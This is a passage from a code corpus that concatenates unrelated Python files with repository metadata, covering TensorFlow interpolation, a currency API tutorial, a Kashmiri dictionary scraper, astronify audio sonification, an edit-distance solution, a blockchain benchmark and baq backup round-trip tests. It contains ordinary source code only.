
            # Symmetric boundary fix at the right-hand edge of the grid.
            right_boundary_pts = tf.where(lower_grid_pt_idxs > num_grid_points - num_coefficients)
            num_right = len(right_boundary_pts)
            if num_right > 0:
                right_boundary_pts = tf.squeeze(right_boundary_pts, 1)
                x_grid_last = tf.tile(tf.transpose(tf.expand_dims(x_grid[i, -num_coefficients:], 1)), [num_right, 1])
                grid_targets = tf.tile(tf.expand_dims(tf.gather(x_target[:, i], right_boundary_pts), 1), [1, num_coefficients])
                dists = tf.abs(x_grid_last - grid_targets)
                closest_from_last = tf.argmin(dists, 1)

                for j in range(num_right):
                    dim_interp_values[right_boundary_pts[j], :] = 0
                    dim_interp_values[right_boundary_pts[j], closest_from_last[j]] = 1
                    lower_grid_pt_idxs[right_boundary_pts[j]] = num_grid_points - num_coefficients

            # Expand this dimension's stencil into the flattened multi-dim layout.
            offset = tf.expand_dims(tf.constant(interp_points) - tf.reduce_min(interp_points), -2)
            dim_interp_indices = tf.expand_dims(lower_grid_pt_idxs, -1) + offset

            n_inner_repeat = num_coefficients ** i
            n_outer_repeat = num_coefficients ** (num_dim - i - 1)
            index_coeff = num_grid_points ** (num_dim - i - 1)

            dim_interp_indices = tf.tile(tf.expand_dims(dim_interp_indices, -1), [1, n_inner_repeat, n_outer_repeat])
            dim_interp_values = tf.tile(tf.expand_dims(dim_interp_values, -1), [1, n_inner_repeat, n_outer_repeat])
            interp_indices = interp_indices + tf.reshape(dim_interp_indices, [num_target_points, -1]) * index_coeff
            interp_values = interp_values * tf.reshape(dim_interp_values, [num_target_points, -1])
        return interp_indices, interp_values
| 1.671875 | 2 |
aula_api.py | davidtav/aprendendo_python | 0 | 12761474 | <filename>aula_api.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8

# In[ ]:

# install the requests library

# In[1]:

get_ipython().system(' pip install requests')

# In[ ]:

# import the requests library

# In[2]:

import requests

# In[ ]:

# (url=) define the URL to be requested
# (requests.get) perform the GET request
# (print(req.status_code)) show the HTTP status code

# In[3]:

url = 'https://api.exchangerate-api.com/v6/latest'
req = requests.get(url)
print(req.status_code)

# In[ ]:

# (dados = req.json()) decode the response body as JSON
# (print(dados)) show the returned data

# In[4]:

dados = req.json()
print(dados)

# In[ ]:

# (valor_reais = float(input()) prompt the user for the amount to convert
# (cotacao = dados['rates']['BRL']) read the BRL exchange rate from ['rates']
# (print(...)) show the converted amount in US dollars

# In[8]:

valor_reais = float(input('Informe o valor em R$ a ser convertido\n'))
cotacao = dados['rates']['BRL']
print(f'R${valor_reais} em dólar valem US${(valor_reais/cotacao):.2f}')

# In[ ]:
tests/__main__.py | etingof/scopedconfig | 0 | 12761475 | #
# This file is part of scopedconfig software.
#
# Copyright (c) 2019, <NAME> <<EMAIL>>
# License: https://github.com/etingof/scopedconfig/blob/master/LICENSE.rst
#
import unittest
suite = unittest.TestLoader().loadTestsFromNames(
['tests.unit.__main__.suite']
)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite)
| 1.429688 | 1 |
py/Utility.SetData.py | mathematicalmichael/SpringNodes | 51 | 12761476 | <filename>py/Utility.SetData.py
import System

# Dynamo node inputs: a key string and the payload to share between graphs.
dataKey, data = IN
# Stash the payload in the .NET AppDomain under a namespaced key so other
# Dynamo nodes in the same process can retrieve it later.
System.AppDomain.CurrentDomain.SetData("_Dyn_Wireless_%s" % dataKey, data)
Extrator.py | ubaierbhat/kzwebscrap | 1 | 12761477 | import json
from time import sleep
from Transliterator import transliterate_to_english
import requests
from bs4 import BeautifulSoup
# Folders for the scraped raw HTML pages and the extracted JSON output.
path_raw = './data/raw/'
path_json = './data/json/'
# English-version search endpoint of the Kashmiri dictionary site.
url = "http://www.kashmirizabaan.com/eng_ver.php"
def query(key):
    """Fetch dictionary matches for *key* from kashmirizabaan.com and save the
    cleaned-up, prettified HTML page under ``path_raw``.

    :param key: two-letter search prefix used both in the POST payload and in
        the output file name.
    """
    payload = f'meaning_target={key}&Submit=Go&lantype=hin&opt_dic=mat_like'
    headers = {
        'Connection': "keep-alive",
        'Content-Type': "application/x-www-form-urlencoded",
        'Accept-Language': "en,et;q=0.9,ur;q=0.8",
    }
    page = requests.request("POST", url, data=payload, headers=headers)
    page.encoding = 'utf-8'

    # cleanup: strip the site's boilerplate and malformed markup before parsing
    page_text = page.text
    page_text = page_text.replace("<table>", '')
    page_text = page_text.replace(" ", '')
    page_text = page_text.replace("</br>", '<br />')
    page_text = page_text.replace('<table width="717" border="0" bordercolor="#F0F0F0" bgcolor="#FFFFFF">', '<table>')
    page_text = page_text.replace('<font color="#CC6600">', '')
    page_text = page_text.replace('</div>\n\n</body>', '</body>')
    page_text = page_text.replace('<font face="Afan_Koshur_Naksh,Afan Koshur Naksh,Times New Roman" size=4>', '')
    page_text = page_text.replace('<font face=\\"Afan_Koshur_Naksh,Afan Koshur Naksh,Times New Roman\\" size=4>', '')
    page_text = page_text.replace(
        '<form name="dictionary" method="post" action=""onSubmit=return validate_form(this) >', '')
    page_text = page_text.replace('</div></th>', '<div></div></th>')

    soup = BeautifulSoup(page_text, 'lxml')
    page_text = soup.prettify()

    # Use a context manager so the file handle is closed even if write() fails.
    with open(get_raw_filename(key), 'w', encoding='utf-16') as file:
        file.write(page_text)
def load(key):
filename = get_raw_filename(key)
print(filename)
file = open(filename, 'r', encoding='utf-16')
page = file.read()
file.close()
return page
def get_raw_filename(key):
    """Return the path of the raw HTML dump for *key*."""
    return '{}{}.html'.format(path_raw, key)
def get_json_filename(key):
    """Return the path of the extracted JSON file for *key*."""
    return '{}{}.json'.format(path_json, key)
def export_to_json(key, data):
    """Write *data* as pretty-printed, non-ASCII-escaped JSON (UTF-16) for *key*."""
    # The `with` block closes the file; the explicit fp.close() was redundant.
    with open(get_json_filename(key), 'w', encoding='utf-16') as fp:
        json.dump(data, fp, ensure_ascii=False, indent=2)
def from_to_json(key):
    """Load and return the previously exported JSON data for *key*."""
    # The `with` block closes the file; the explicit fp.close() was redundant.
    with open(get_json_filename(key), 'r', encoding='utf-16') as fp:
        return json.load(fp)
def for_each_key_do(action):
    """Apply *action* to every two-letter key combination and yield each result."""
    alfabits = '<KEY>'
    for first in alfabits:
        for second in alfabits:
            yield action(f'{first}{second}')
def fetch_data(key):
    """Download and persist the raw results page for *key*.

    Always returns 1, so driving it through ``for_each_key_do`` yields a
    summable progress count.
    """
    print(f'searching for {key}')
    query(key)
    sleep(0.25)  # throttle requests to be polite to the remote server
    return 1
def transform(key):
    """Parse the saved raw HTML page for *key* into dictionary entries,
    export them to JSON and return the number of words found."""
    word_count = 0
    entries = []
    print(f'transforming for {key}')
    page = load(key)
    soup = BeautifulSoup(page, 'html.parser')
    tables = soup.find_all("table")
    # The first table is page chrome; result rows start from the second table.
    if len(tables) > 1:
        for i in range(1, len(tables)):
            element = tables[i]
            tds = element.findAll('td')
            ks_word = tds[0].getText().strip()
            # Skip blank rows and the "..." (Arabic-script ellipsis) placeholder.
            if ks_word == '' or ks_word == '۔۔۔':
                continue
            print('----------------------')
            category = tds[1].getText().strip()
            en_example = tds[2].getText().strip()
            hi_meaning = tds[3].getText().strip()
            ks_example = tds[4].getText().strip()
            en_meaning = tds[5].getText().strip()
            transliteration = transliterate_to_english(ks_word)
            print(f'ks_word = {ks_word}')
            print(f'category = {category}')
            print(f'en_example = {en_example}')
            print(f'hi_meaning = {hi_meaning}')
            print(f'ks_example = {ks_example}')
            print(f'en_meaning = {en_meaning}')
            print(f'transliteration = {transliteration}')
            # NOTE(review): hi_meaning is extracted and printed above but never
            # stored in the entry -- confirm whether the Hindi meaning should
            # also be exported.
            entry = {
                'ks_word': ks_word,
                'category': category,
                'en_example': en_example,
                'ks_example': ks_example,
                'en_meaning': en_meaning,
                'transliteration': transliteration
            }
            entries.append(entry)
            word_count = word_count + 1
    export_to_json(key, entries)
    print(f'Total number of words for {key} = {word_count}')
    return word_count
| 2.890625 | 3 |
astronify/series/series.py | ceb8/astronify | 45 | 12761478 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Data Series Sonification
========================
Functionality for sonifying data series.
"""
import warnings
from inspect import signature, Parameter
import numpy as np
from astropy.table import Table, MaskedColumn
from astropy.time import Time
import pyo
from ..utils.pitch_mapping import data_to_pitch
from ..utils.exceptions import InputWarning
__all__ = ['PitchMap', 'SoniSeries']
class PitchMap():

    def __init__(self, pitch_func=data_to_pitch, **pitch_args):
        """
        Class that encapsulates the data value to pitch function
        and associated arguments.

        Parameters
        ----------
        pitch_func : function
            Optional. Defaults to `~astronify.utils.data_to_pitch`.
            If supplying a function it should take a data array as the first
            parameter, and all other parameters should be optional.
        **pitch_args
            Default parameters and values for the pitch function. Should include
            all necessary arguments other than the data values.
        """

        # Setting up the default arguments
        if (not pitch_args) and (pitch_func == data_to_pitch):
            pitch_args = {"pitch_range": [100, 10000],
                          "center_pitch": 440,
                          "zero_point": "median",
                          "stretch": "linear"}

        self.pitch_map_func = pitch_func
        self.pitch_map_args = pitch_args

    def _check_func_args(self):
        """
        Make sure the pitch mapping function and argument dictionary match.

        Note: This function does not check the the function gets all the required arguments.
        """
        # Only test if both pitch func and args are set
        if hasattr(self, "pitch_map_func") and hasattr(self, "pitch_map_args"):

            # Only check parameters if there is no kwargs argument
            param_types = [x.kind for x in signature(self.pitch_map_func).parameters.values()]
            if Parameter.VAR_KEYWORD not in param_types:
                for arg_name in list(self.pitch_map_args):
                    if arg_name not in signature(self.pitch_map_func).parameters:
                        # Warn about and drop arguments the function cannot accept.
                        wstr = "{} is not accepted by the pitch mapping function and will be ignored".format(arg_name)
                        warnings.warn(wstr, InputWarning)
                        del self.pitch_map_args[arg_name]

    def __call__(self, data):
        """
        Apply the pitch mapping function to ``data`` using the stored
        arguments, after validating that the arguments match the function.
        """
        self._check_func_args()
        return self.pitch_map_func(data, **self.pitch_map_args)

    @property
    def pitch_map_func(self):
        """
        The pitch mapping function.
        """
        return self._pitch_map_func

    @pitch_map_func.setter
    def pitch_map_func(self, new_func):
        assert callable(new_func), "Pitch mapping function must be a function."
        self._pitch_map_func = new_func
        self._check_func_args()

    @property
    def pitch_map_args(self):
        """
        Dictionary of additional arguments (other than the data array)
        for the pitch mapping function.
        """
        return self._pitch_map_args

    @pitch_map_args.setter
    def pitch_map_args(self, new_args):
        assert isinstance(new_args, dict), "Pitch mapping function args must be in a dictionary."
        self._pitch_map_args = new_args
        self._check_func_args()
self._check_func_args()
class SoniSeries():
    """A sonified data series: maps one table column to time and one to pitch,
    and can play or write the result via a pyo audio server."""

    def __init__(self, data, time_col="time", val_col="flux"):
        """
        Class that encapsulates a sonified data series.

        Parameters
        ----------
        data : `astropy.table.Table`
            The table of data to be sonified.
        time_col : str
            Optional, default "time". The data column to be mapped to time.
        val_col : str
            Optional, default "flux". The data column to be mapped to pitch.
        """
        # Column names must be set before ``self.data``: the data setter
        # uses them to strip masked/NaN rows and convert Time columns.
        self.time_col = time_col
        self.val_col = val_col
        self.data = data

        # Default specs
        self.note_duration = 0.5 # note duration in seconds
        self.note_spacing = 0.01 # spacing between notes in seconds
        self.gain = 0.05 # default gain in the generated sine wave. pyo multiplier, -1 to 1.
        self.pitch_mapper = PitchMap(data_to_pitch)

        self._init_pyo()

    def _init_pyo(self):
        # Create the pyo audio server; output streams are created by play().
        self.server = pyo.Server()
        self.streams = None

    @property
    def data(self):
        """ The data table (~astropy.table.Table). """
        return self._data

    @data.setter
    def data(self, data_table):

        assert isinstance(data_table, Table), 'Data must be a Table.'

        # Removing any masked values as they interfere with the sonification
        if isinstance(data_table[self.val_col], MaskedColumn):
            data_table = data_table[~data_table[self.val_col].mask]
        if isinstance(data_table[self.time_col], MaskedColumn):
            data_table = data_table[~data_table[self.time_col].mask]

        # Removing any nans as they interfere with the sonification
        data_table = data_table[~np.isnan(data_table[self.val_col])]

        # making sure we have a float column for time
        # NOTE: side effect -- when the time column holds `astropy.time.Time`
        # values, a new float (Julian date) column "asf_time" is added and
        # ``self.time_col`` is repointed at it.
        if isinstance(data_table[self.time_col], Time):
            float_col = "asf_time"
            data_table[float_col] = data_table[self.time_col].jd
            self.time_col = float_col

        self._data = data_table

    @property
    def time_col(self):
        """ The data column mapped to time when sonifying. """
        return self._time_col

    @time_col.setter
    def time_col(self, value):
        assert isinstance(value, str), 'Time column name must be a string.'
        self._time_col = value

    @property
    def val_col(self):
        """ The data column mapped to pitch when sonifying. """
        return self._val_col

    @val_col.setter
    def val_col(self, value):
        assert isinstance(value, str), 'Value column name must be a string.'
        self._val_col = value

    @property
    def pitch_mapper(self):
        """ The pitch mapping object that takes data values to pitch values (Hz). """
        return self._pitch_mapper

    @pitch_mapper.setter
    def pitch_mapper(self, value):
        self._pitch_mapper = value

    @property
    def gain(self):
        """ Adjustable gain for output. """
        return self._gain

    @gain.setter
    def gain(self, value):
        self._gain = value

    @property
    def note_duration(self):
        """ How long each individual note will be in seconds."""
        return self._note_duration

    @note_duration.setter
    def note_duration(self, value):
        # Add in min value check
        self._note_duration = value

    @property
    def note_spacing(self):
        """ The spacing of the notes on average (will adjust based on time) in seconds. """
        return self._note_spacing

    @note_spacing.setter
    def note_spacing(self, value):
        # Add in min value check
        self._note_spacing = value

    def sonify(self):
        """
        Perform the sonification, two columns will be added to the data table: asf_pitch, and asf_onsets.
        The asf_pitch column will contain the sonified data in Hz.
        The asf_onsets column will contain the start time for each note in seconds from the first note.
        Metadata will also be added to the table giving information about the duration and spacing
        of the sonified pitches, as well as an adjustable gain.
        """
        data = self.data
        # Median time step of the series, used to scale onsets to note_spacing.
        exptime = np.median(np.diff(data[self.time_col]))

        data.meta["asf_exposure_time"] = exptime
        data.meta["asf_note_duration"] = self.note_duration
        data.meta["asf_spacing"] = self.note_spacing

        data["asf_pitch"] = self.pitch_mapper(data[self.val_col])
        data["asf_onsets"] = [x for x in (data[self.time_col] - data[self.time_col][0])/exptime*self.note_spacing]

    def play(self):
        """
        Play the data sonification.
        """

        # Making sure we have a clean server
        if self.server.getIsBooted():
            self.server.shutdown()
        self.server.boot()
        self.server.start()

        # Getting data ready
        duration = self.data.meta["asf_note_duration"]
        # Pitches/onsets are doubled; presumably to feed a stereo pair of
        # streams per note -- TODO confirm against pyo stream layout.
        pitches = np.repeat(self.data["asf_pitch"], 2)
        delays = np.repeat(self.data["asf_onsets"], 2)

        # TODO: This doesn't seem like the best way to do this, but I don't know
        # how to make it better
        env = pyo.Linseg(list=[(0, 0), (0.01, 1), (duration - 0.1, 1),
                               (duration - 0.05, 0.5), (duration - 0.005, 0)],
                         mul=[self.gain for i in range(len(pitches))]).play(
                             delay=list(delays), dur=duration)

        self.streams = pyo.Sine(list(pitches), 0, env).out(delay=list(delays),
                                                           dur=duration)

    def stop(self):
        """
        Stop playing the data sonification.
        """
        self.streams.stop()

    def write(self, filepath):
        """
        Save data sonification to the given file.
        Currently the only output option is a wav file.

        Parameters
        ----------
        filepath : str
            The path to the output file.
        """

        # Getting data ready
        duration = self.data.meta["asf_note_duration"]
        pitches = np.repeat(self.data["asf_pitch"], 2)
        delays = np.repeat(self.data["asf_onsets"], 2)

        # Making sure we have a clean server, rendering offline (to file)
        # instead of to the sound card.
        if self.server.getIsBooted():
            self.server.shutdown()
        self.server.reinit(audio="offline")
        self.server.boot()
        self.server.recordOptions(dur=delays[-1]+duration, filename=filepath)

        env = pyo.Linseg(list=[(0, 0), (0.1, 1), (duration - 0.1, 1),
                               (duration - 0.05, 0.5), (duration - 0.005, 0)],
                         mul=[self.gain for i in range(len(pitches))]).play(
                             delay=list(delays), dur=duration)
        sine = pyo.Sine(list(pitches), 0, env).out(delay=list(delays), dur=duration)  # noqa: F841
        self.server.start()

        # Clean up: restore the realtime audio backend for later play() calls.
        self.server.shutdown()
        self.server.reinit(audio="portaudio")
Week 5/id_510/s/LeetCode_72_510.py | larryRishi/algorithm004-05 | 1 | 12761479 | <reponame>larryRishi/algorithm004-05
##
#给定两个单词 word1 和 word2,计算出将 word1 转换成 word2 所使用的最少操作数 。
#
# 你可以对一个单词进行如下三种操作:
#
# 插入一个字符
# 删除一个字符
# 替换一个字符
# 示例 1:
#
# 输入: word1 = "horse", word2 = "ros"
# 输出: 3
# 解释:
# horse -> rorse (将 'h' 替换为 'r')
# rorse -> rose (删除 'r')
# rose -> ros (删除 'e')
# 示例 2:
#
# 输入: word1 = "intention", word2 = "execution"
# 输出: 5
# 解释:
# intention -> inention (删除 't')
# inention -> enention (将 'i' 替换为 'e')
# enention -> exention (将 'n' 替换为 'x')
# exention -> exection (将 'n' 替换为 'c')
# exection -> execution (插入 'u')
#
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/edit-distance
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
#/
class Solution:
    def minDistance(self, word1: str, word2: str) -> int:
        """Return the minimum number of single-character edits (insert,
        delete, replace) needed to transform ``word1`` into ``word2``.

        Classic Levenshtein-distance dynamic programming with a rolling
        row: O(len(word1) * len(word2)) time, O(len(word2)) memory.
        The original stub only contained ``pass``.
        """
        m, n = len(word1), len(word2)
        # Converting to/from the empty string costs one edit per character.
        if m == 0 or n == 0:
            return m + n
        # prev[j] = edit distance between word1[:i-1] and word2[:j]
        prev = list(range(n + 1))
        for i in range(1, m + 1):
            # curr[0]: deleting all i characters of word1[:i]
            curr = [i] + [0] * n
            for j in range(1, n + 1):
                if word1[i - 1] == word2[j - 1]:
                    # Characters match: no additional edit needed.
                    curr[j] = prev[j - 1]
                else:
                    # 1 + min(replace, delete from word1, insert into word1)
                    curr[j] = 1 + min(prev[j - 1], prev[j], curr[j - 1])
            prev = curr
        return prev[n]
| 3.390625 | 3 |
src/benchmark.py | Emory-AIMS/idash2019 | 3 | 12761480 | <gh_stars>1-10
import time
import os
from pathlib import Path
from tqdm import tqdm
from utils import *
from blockchain import Blockchain
from localDB import LocalDB
import json
from logger import log
import logging
# log.setLevel(logging.DEBUG)
# log.setLevel(logging.ERROR)
data_dir = '/home/mark/idash2019/data'
TRANSACTION_GAS = 21000
BLOCKING = False
def benchmark(contract, size):
    """Benchmark one baseline contract against ``size`` records.

    Deploys the main contract found at ``./contract/{contract}`` (all other
    .sol files in that directory are linked as libraries), inserts the first
    ``size`` records from ``data_dir`` into both the blockchain and a local
    database, then times queries for every wildcard variant of each key.

    Returns a dict with three sections:
      * 'Storage'   -- total/average gas used by the inserts.
      * 'Insertion' -- total/average local-DB insert time (seconds).
      * 'Query'     -- average query latency bucketed by the number of
                       wildcard components ('0 *' .. '3 *').
    """
    contract_dir = f"./contract/{contract}"
    contracts = load_contracts(contract_dir)
    main_contract = f"{contract}.sol"
    main_contract = Path(contract_dir).joinpath(main_contract).resolve()
    # The main contract is deployed directly; remove it from the library list.
    contracts.remove(main_contract)
    records = load_data(data_dir)[:size]
    bc = Blockchain(blocking=BLOCKING, libraries=contracts,
                    contract=main_contract, ipcfile='/home/mark/eth/node0/geth.ipc',
                    timeout=120)
    db = LocalDB()
    result = {}
    tx_hashs = []
    elapsed = 0
    # Insert every record into the chain (async) and the local DB (timed).
    for record in tqdm(records):
        tx_hash = bc.insert(*record)
        elapsed += timer(db.insert, *record)
        tx_hashs.append(tx_hash)
    receipts = bc.wait_all(tx_hashs)
    totalGas = sum([r['gasUsed'] for r in receipts])
    # Measured by gas
    result['Storage'] = {'Unit': 'gas',
                         'Total': totalGas, 'Average': totalGas // size}
    # Measured by time
    result['Insertion'] = {'Unit': 'second',
                           'Total': elapsed, 'Average': elapsed / size}
    # Query timings, keyed by number of wildcard components in the query.
    query = {f"{i} *": 0 for i in range(4)}
    query['Unit'] = 'second'
    # The single all-wildcard query.
    elapsed = timer(bc.query, "*", "*", "*")
    query["3 *"] = elapsed
    for key in tqdm(db.getKeys()):
        # possibleKeys() presumably yields 7 wildcard variants of a 3-part
        # key in a fixed order (indices 0,1,3 -> two wildcards; 2,4,5 -> one;
        # the rest -> none) -- TODO confirm against possibleKeys().
        pks = possibleKeys(key)
        for i, pk in enumerate(pks):
            elapsed = timer(bc.query, *pk)
            if i in [0, 1, 3]:
                query["2 *"] += elapsed
            elif i in [2, 4, 5]:
                query["1 *"] += elapsed
            else:
                query["0 *"] += elapsed
    # 7 variants per key plus the single global query.
    query["Average"] = query["2 *"] + \
        query["1 *"] + query["0 *"] + query["3 *"]
    query["Average"] /= (7 * size + 1)
    query["2 *"] /= (3*size)
    query["1 *"] /= (3*size)
    query["0 *"] /= size
    result['Query'] = query
    return result
def main():
    """Run every baseline contract benchmark across increasing data sizes
    and dump the combined results to ``benchmark.json``."""
    sizes = [100 * 4 ** exponent for exponent in range(4)]
    contract_names = ["baseline%d" % variant for variant in (2, 3, 4, 5)]
    results = {size: {} for size in sizes}
    for size in sizes:
        for contract_name in contract_names:
            print(contract_name)
            results[size][contract_name] = benchmark(contract_name, size)
    with open('benchmark.json', 'w') as output_file:
        json.dump(results, output_file)


if __name__ == '__main__':
    main()
| 2.140625 | 2 |
hs_access_control/management/commands/groups_with_public_resources.py | tommac7/hydroshare | 0 | 12761481 | """
This prints a list of publicly accessible resources in a group
"""
from django.core.management.base import BaseCommand
from hs_access_control.models import GroupAccess
def usage():
    """Print a short command-line usage summary to stdout."""
    for usage_line in (
        "groups_with_public_resources usage:",
        "    groups_with_public_resources ",
    ):
        print(usage_line)
def shorten(title, length):
    """Return *title* unchanged if it fits in *length* characters,
    otherwise truncate it to *length* characters and append '...'.

    Bug fix: the original truncated to a hard-coded 19 characters
    (``title[0:19]``) regardless of the *length* argument; the
    parameter is now honored.
    """
    if len(title) <= length:
        return title
    return title[:length] + '...'
def access_type(thing):
    """Return the access-level label for a resource-like mapping.

    Precedence is published > public > discoverable; anything else
    is reported as 'private'.
    """
    for flag in ('published', 'public', 'discoverable'):
        if thing[flag]:
            return flag
    return 'private'
class Command(BaseCommand):
    """Django management command that prints every group owning at least
    one publicly accessible resource, one line per group."""

    help = """List public groups."""

    def handle(self, *args, **options):
        # GroupAccess.groups_with_public_resources() yields the groups to
        # report; print each group's name and database id.
        for g in GroupAccess.groups_with_public_resources():
            # n = g.gaccess.public_resources.count()
            print("group is {} (id={})".format(g.name, g.id))
| 2.953125 | 3 |
dannce/utils/rat7m/loadStructs.py | diegoaldarondo/dannce | 1 | 12761482 | <gh_stars>1-10
import scipy.io as sio
import numpy as np
def load_data(path, key):
    """Load a MATLAB struct array stored under *key* in the .mat file at
    *path* and flatten it into a list of plain dicts.

    Each element of the returned list maps a field name to the array stored
    at ``record[field][0, 0]``.

    NOTE(review): the original version left an ``import pdb;
    pdb.set_trace()`` breakpoint in place, and loaded with
    ``struct_as_record=False`` but then iterated ``vars(...)`` (whose keys
    are strings) while accessing ``.dtype.names`` on them, which cannot
    work.  This version loads the structs as numpy records (scipy's
    default) so the documented ``dataset[i][key][0, 0]`` access pattern is
    valid, and removes the breakpoint.  It also avoids shadowing the
    ``key`` parameter inside the loop.
    """
    mat = sio.loadmat(path)
    dataset = mat[key][0]
    # Data are loaded in an awkward structure where the array we want is
    # nested at record[field][0, 0].  Simplify that structure here.
    # Views cannot be used because of shape mismatches, so new dicts are
    # built and returned.
    data = []
    for record in dataset:
        simplified = {}
        for field in record.dtype.names:
            simplified[field] = record[field][0, 0]
        data.append(simplified)
    return data
def load_cameras(path):
    """Read the 'cameras' struct from the MATLAB file at *path*.

    Returns a dict mapping each camera name to a dict of that camera's
    fields ({field name -> value}).
    """
    contents = sio.loadmat(path, struct_as_record=False)
    camera_struct = vars(contents["cameras"][0][0])
    cameras = {}
    for cam_name in camera_struct['_fieldnames']:
        fields = vars(camera_struct[cam_name][0][0])
        cameras[cam_name] = {fn: fields[fn] for fn in fields['_fieldnames']}
    return cameras
def load_mocap(path):
    """Read the 'mocap' struct from the MATLAB file at *path* and stack all
    marker trajectories along a new third axis, in the struct's field order."""
    contents = sio.loadmat(path, struct_as_record=False)
    marker_struct = vars(contents["mocap"][0][0])
    trajectories = [marker_struct[name] for name in marker_struct['_fieldnames']]
    return np.stack(trajectories, axis=2)
tests/test_operations.py | messa/baq | 1 | 12761483 | from datetime import datetime
import gzip
import json
import os
from pytest import fixture
from time import sleep
from baq.operations import backup, restore
from baq.backends import FileBackend
@fixture
def sample_age_key(temp_dir):
    # Pytest fixture: writes an age secret key file into the test temp dir
    # and returns the matching public key (recipient) string.
    # NOTE(review): the key material appears as '<KEY>' placeholders in this
    # copy of the file (redacted) -- confirm real test keys upstream.
    secret_key_path = temp_dir / 'age_key'
    secret_key_path.write_text('<KEY>')
    public_key = '<KEY>'
    return public_key
def test_backup_and_restore_without_encryption(temp_dir):
    """Round-trip a small source tree through an unencrypted backup and
    verify restored file contents and the expected backup artifact names."""
    # Build a tiny source tree to back up.
    (temp_dir / 'src').mkdir()
    (temp_dir / 'src/hello.txt').write_text('Hello, World!\n')
    (temp_dir / 'src/dir1').mkdir()
    (temp_dir / 'src/dir1/sample.txt').write_text('This is dir1/sample.txt\n')
    backend = FileBackend(temp_dir / 'backup_target')
    # No recipients -> no encryption.
    backup_result = backup(temp_dir / 'src', backend=backend, recipients=[], recipients_files=[])
    backup_id = backup_result.backup_id
    (temp_dir / 'restored').mkdir()
    restore(temp_dir / 'restored', backend, backup_id, [])
    # Restored files must be byte-identical to the originals.
    assert (temp_dir / 'src/hello.txt').read_bytes() == (temp_dir / 'restored/hello.txt').read_bytes()
    assert (temp_dir / 'src/dir1/sample.txt').read_bytes() == (temp_dir / 'restored/dir1/sample.txt').read_bytes()
    # Exactly one data file and one metadata file should exist.
    assert sorted(p.name for p in (temp_dir / 'backup_target').iterdir()) == [
        f'baq.{backup_id}.data.00000',
        f'baq.{backup_id}.meta',
    ]
def test_backup_and_restore(temp_dir, sample_age_key):
    """Round-trip an encrypted backup and verify restored contents, the
    produced artifact names, and the full decoded metadata stream."""
    # Build a tiny source tree to back up.
    (temp_dir / 'src').mkdir()
    (temp_dir / 'src/hello.txt').write_text('Hello, World!\n')
    (temp_dir / 'src/dir1').mkdir()
    (temp_dir / 'src/dir1/sample.txt').write_text('This is dir1/sample.txt\n')
    backend = FileBackend(temp_dir / 'backup_target')
    # Encrypt to the fixture's age public key; restore with the secret key.
    backup_result = backup(temp_dir / 'src', backend=backend, recipients=[sample_age_key], recipients_files=[])
    backup_id = backup_result.backup_id
    (temp_dir / 'restored').mkdir()
    restore(temp_dir / 'restored', backend, backup_id, [temp_dir / 'age_key'])
    assert (temp_dir / 'src/hello.txt').read_bytes() == (temp_dir / 'restored/hello.txt').read_bytes()
    assert (temp_dir / 'src/dir1/sample.txt').read_bytes() == (temp_dir / 'restored/dir1/sample.txt').read_bytes()
    assert sorted(p.name for p in (temp_dir / 'backup_target').iterdir()) == [
        f'baq.{backup_id}.data.00000',
        f'baq.{backup_id}.meta',
    ]
    # The metadata file is a gzipped stream of one JSON object per line;
    # non-deterministic values (timestamps, digests of encrypted keys) are
    # compared against themselves via meta_content[...] lookups.
    meta_path = temp_dir / f'backup_target/baq.{backup_id}.meta'
    meta_content = [json.loads(line) for line in gzip.decompress(meta_path.read_bytes()).splitlines()]
    assert meta_content == [
        {
            'baq_backup': {
                'file_format_version': 'v1',
                'backup_id': backup_id,
                'date': meta_content[0]['baq_backup']['date'],
                'encryption_keys': [
                    {
                        'backup_id': backup_id,
                        'sha1': meta_content[0]['baq_backup']['encryption_keys'][0]['sha1'],
                        'age_encrypted': meta_content[0]['baq_backup']['encryption_keys'][0]['age_encrypted'],
                    }
                ]
            }
        }, {
            'directory': {
                'atime': meta_content[1]['directory']['atime'],
                'ctime': meta_content[1]['directory']['ctime'],
                'mtime': meta_content[1]['directory']['mtime'],
                'uid': meta_content[1]['directory']['uid'],
                'gid': meta_content[1]['directory']['gid'],
                'mode': meta_content[1]['directory']['mode'],
                'path': '.',
            }
        }, {
            'file': {
                'atime': meta_content[2]['file']['atime'],
                'ctime': meta_content[2]['file']['ctime'],
                'mtime': meta_content[2]['file']['mtime'],
                'uid': meta_content[2]['file']['uid'],
                'gid': meta_content[2]['file']['gid'],
                'mode': meta_content[2]['file']['mode'],
                'path': 'hello.txt',
            }
        }, {
            'content': {
                'offset': 0,
                'sha3_512': 'adb798d7b4c94952e61c5d9beed5d3bf9443460f5d5a9f17eb32def95bc23ba8608f7630ea236958602500d06f5c19c64114c06ce09f1b92301b9c3fc73f0728',
                'encryption_key_sha1': meta_content[0]['baq_backup']['encryption_keys'][0]['sha1'],
                'df_name': f'baq.{backup_id}.data.00000',
                'df_offset': 0,
                'df_size': 33,
            }
        }, {
            'file_done': {
                'sha3_512': 'adb798d7b4c94952e61c5d9beed5d3bf9443460f5d5a9f17eb32def95bc23ba8608f7630ea236958602500d06f5c19c64114c06ce09f1b92301b9c3fc73f0728',
            }
        }, {
            'directory': {
                'atime': meta_content[5]['directory']['atime'],
                'ctime': meta_content[5]['directory']['ctime'],
                'mtime': meta_content[5]['directory']['mtime'],
                'uid': meta_content[5]['directory']['uid'],
                'gid': meta_content[5]['directory']['gid'],
                'mode': meta_content[5]['directory']['mode'],
                'path': 'dir1',
            }
        }, {
            'file': {
                'atime': meta_content[6]['file']['atime'],
                'ctime': meta_content[6]['file']['ctime'],
                'mtime': meta_content[6]['file']['mtime'],
                'uid': meta_content[6]['file']['uid'],
                'gid': meta_content[6]['file']['gid'],
                'mode': meta_content[6]['file']['mode'],
                'path': 'dir1/sample.txt',
            }
        }, {
            'content': {
                'offset': 0,
                'sha3_512': 'd318a04d4a61bcb9f2f10a9523c30cfef69922fea0a3c4c1c7f5f01fed01cea9ee4a9a14e29126fadb0427eae42df1efa8a0cd18eb0d75a96241a1da432dbe8d',
                'encryption_key_sha1': meta_content[0]['baq_backup']['encryption_keys'][0]['sha1'],
                'df_name': f'baq.{backup_id}.data.00000',
                'df_offset': 33,
                'df_size': 49,
